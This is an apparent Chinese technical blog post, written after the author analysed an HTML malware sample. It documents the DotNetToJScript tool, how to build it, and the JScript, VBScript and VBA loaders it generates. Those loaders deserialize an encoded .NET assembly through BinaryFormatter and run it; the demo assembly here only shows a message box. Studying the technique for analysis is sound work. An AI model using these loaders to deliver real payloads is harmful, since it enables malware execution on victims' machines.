【逆向】DotNetToJScript-反序列化加载.NET程序

前言

最近分析了一个html的样本,其中JS代码是用开源工具"DotNetToJScript"生成的,其主要功能就是通过反序列化加载执行.NET程序,所以这里对"DotNetToJScript"工具做个简单记录。

项目结构

DotNetToJScript(主项目)

ExampleAssembly(测试程序项目)
其中测试程序是一个包含“TestClass”类的DLL文件,无参构造中简单输出一个Msg弹窗

编译生成

可以自己编译,也可以直接下载Release版,如果报错可以参考以下方法解决:
报错1: 缺少程序集引用NDesk.Options
解决方法:需要添加引用NDesk.Options
下载地址:http://www.ndesk.org/Options
解压缩,工程-添加引用-浏览-\ndesk-options-0.2.1.bin\ndesk-options-0.2.1.bin\lib\ndesk-options\NDesk.Options.dll
指定目标框架为.NET Frameword 2.0,重新编译即可

 

报错2: 缺少程序集引用Linq
解决方法:添加对System.Core.dll 3.5的引用
位置: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Core.dll

生成后在项目对应bin目录会有DotNetToJScript.exeExampleAssembly.dll

使用示例

使用"ExampleAssembly.dll"作为测试Payload

ToJS

1 C:\Users\Sunset\Desktop\DotNetToJScript-master\DotNetToJScript\bin\Debug>DotNetToJScript.exe -o Test.js ExampleAssembly.dll
 1 function setversion() {
 2 }
 3 function debug(s) {}
 4 
 5 function base64ToStream(b) {
 6     var enc = new ActiveXObject("System.Text.ASCIIEncoding");
 7     var length = enc.GetByteCount_2(b);
 8     var ba = enc.GetBytes_4(b);
 9     var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
10     ba = transform.TransformFinalBlock(ba, 0, length);
11     var ms = new ActiveXObject("System.IO.MemoryStream");
12     ms.Write(ba, 0, (length / 4) * 3);
13     ms.Position = 0;
14     return ms;
15 }
16 
17 var serialized_obj = 
18 "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
19 "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
20 "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
21 "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
22 //省略部分内容
23 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
24 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
25 "AAAAAAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVm"+
26 "bGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
27 var entry_class = 'TestClass';
28 
29 try {
30     setversion();
31     //解码
32     var stm = base64ToStream(serialized_obj);
33     var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
34     var al = new ActiveXObject('System.Collections.ArrayList');
35     //反序列化
36     var d = fmt.Deserialize_2(stm);
37     al.Add(undefined);
38     //创建实例调用无参构造,执行MessageBox
39     var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
40     
41 } catch (e) {
42     debug(e.message);
43 }
View Code

ToVBS

1 C:\Users\Sunset\Desktop\DotNetToJScript-master\DotNetToJScript\bin\Debug>DotNetToJScript.exe -l vbscript -o Test.vbs ExampleAssembly.dll
 1 Sub DebugPrint(s)
 2 End Sub
 3 
 4 Sub SetVersion
 5 End Sub
 6 
 7 Function Base64ToStream(b)
 8   Dim enc, length, ba, transform, ms
 9   Set enc = CreateObject("System.Text.ASCIIEncoding")
10   length = enc.GetByteCount_2(b)
11   Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform")
12   Set ms = CreateObject("System.IO.MemoryStream")
13   ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)
14   ms.Position = 0
15   Set Base64ToStream = ms
16 End Function
17 
18 Sub Run
19 Dim s, entry_class
20 s = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"
21 s = s & "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"
22 s = s & "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"
23 s = s & "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"
24 '省略部分内容
25 s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
26 s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
27 s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
28 s = s & "AAAAAAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVm"
29 s = s & "bGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"
30 entry_class = "TestClass"
31 
32 Dim fmt, al, d, o
33 Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
34 Set al = CreateObject("System.Collections.ArrayList")
35 al.Add Empty
36 '与JS代码基本相同
37 Set d = fmt.Deserialize_2(Base64ToStream(s))
38 Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
39 End Sub
40 
41 SetVersion
42 On Error Resume Next
43 Run
44 If Err.Number <> 0 Then
45   DebugPrint Err.Description
46   Err.Clear
47 End If
View Code

ToVBA

1 C:\Users\Sunset\Desktop\DotNetToJScript-master\DotNetToJScript\bin\Debug>DotNetToJScript.exe -l vba -o Test.txt ExampleAssembly.dll
 1 Sub DebugPrint(s)
 2 End Sub
 3 
 4 Private Function decodeHex(hex)
 5     On Error Resume Next
 6     Dim DM, EL
 7     Set DM = CreateObject("Microsoft.XMLDOM")
 8     Set EL = DM.createElement("tmp")
 9     EL.DataType = "bin.hex"
10     EL.Text = hex
11     decodeHex = EL.NodeTypedValue
12 End Function
13 
14 Function Run()
15     On Error Resume Next
16 
17     Dim s As String
18     s = "0001000000FFFFFFFF010000000000000004010000002253797374656D2E44656C656761746553657269616C697A6174696F6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300303033053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E7472792253797374656D2E44656C65"
19     s = s & "6761746553657269616C697A6174696F6E486F6C6465722F53797374656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C64657209020000000903000000090400000004020000003053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727907000000047479706508"
20     s = s & "617373656D626C79067461726765741274617267657454797065417373656D626C790E746172676574547970654E616D650A6D6574686F644E616D650D64656C6567617465456E747279010102010101033053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727906050000002F53797374656D2E52756E74696D65"
21     '省略部分内容
22     s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
23     s = s & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010D0000000400000009170000000906000000"
24     s = s & "0916000000061A0000002753797374656D2E5265666C656374696F6E2E417373656D626C79204C6F616428427974655B5D29080000000A0B"
25 
26     entry_class = "TestClass"
27 
28     Dim stm As Object, fmt As Object, al As Object
29     Set stm = CreateObject("System.IO.MemoryStream")
30 
31     If stm Is Nothing Then
32         manifest = "<?xml version=""1.0"" encoding=""UTF-16"" standalone=""yes""?><assembly xmlns=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0""><assemblyIdentity name=""mscorlib"" version=""4.0.0.0"" publicKeyToken=""B77A5C561934E089"" /><clrClass clsid=""{D0CBA7AF-93F5-378A-BB11-2A5D9AA9C4D7}"" progid=""System.Runtime.Ser"
33         manifest = manifest & "ialization.Formatters.Binary.BinaryFormatter"" threadingModel=""Both"" name=""System.Runtime.Serialization.Formatters.Binary.BinaryFormatter"" runtimeVersion=""v4.0.30319"" /><clrClass clsid=""{8D907746-455E-39A7-BD31-BC9F81468347}"" progid=""System.Collections.ArrayList"" threadingModel=""Both"" name=""System.Co"
34         manifest = manifest & "llections.ArrayList"" runtimeVersion=""v4.0.30319"" /><clrClass clsid=""{8D907846-455E-39A7-BD31-BC9F81468347}"" progid=""System.Text.ASCIIEncoding"" threadingModel=""Both"" name=""System.Text.ASCIIEncoding"" runtimeVersion=""v4.0.30319"" /><clrClass clsid=""{8D907846-455E-39A7-BD31-BC9F81488347}"" progid=""System."
35         manifest = manifest & "Security.Cryptography.FromBase64Transform"" threadingModel=""Both"" name=""System.Security.Cryptography.FromBase64Transform"" runtimeVersion=""v4.0.30319"" /><clrClass clsid=""{8D907846-455E-39A7-BD31-BC9F81468B47}"" progid=""System.IO.MemoryStream"" threadingModel=""Both"" name=""System.IO.MemoryStream"" runtimeV"
36         manifest = manifest & "ersion=""v4.0.30319"" /></assembly>"
37 
38         Set ax = CreateObject("Microsoft.Windows.ActCtx")
39         ax.ManifestText = manifest
40         
41         Set stm = ax.CreateObject("System.IO.MemoryStream")
42         Set fmt = ax.CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
43         Set al = ax.CreateObject("System.Collections.ArrayList")
44     Else
45         Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
46         Set al = CreateObject("System.Collections.ArrayList")
47     End If
48 
49     Dim dec
50     dec = decodeHex(s)
51 
52     For Each i In dec
53         stm.WriteByte i
54     Next i
55 
56     stm.Position = 0
57 
58     Dim n As Object, d As Object, o As Object
59     Set d = fmt.Deserialize_2(stm)
60     al.Add Empty
61     '与JS代码基本相同
62     Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
63     
64     If Err.Number <> 0 Then
65       DebugPrint Err.Description
66       Err.Clear
67     End If
68 End Function
View Code

参考资料

https://github.com/tyranid/DotNetToJScript
https://bbs.pediy.com/thread-252293.htm
https://patrilic.top/2020/03/10/DotNetToJScript%20&&%20GadgetToJScript/#0x01-DotNetToJScript
https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8JS%E5%8A%A0%E8%BD%BD.Net%E7%A8%8B%E5%BA%8F/

posted @ 2020-04-03 20:15  SunsetR  阅读(1679)  评论(1编辑  收藏  举报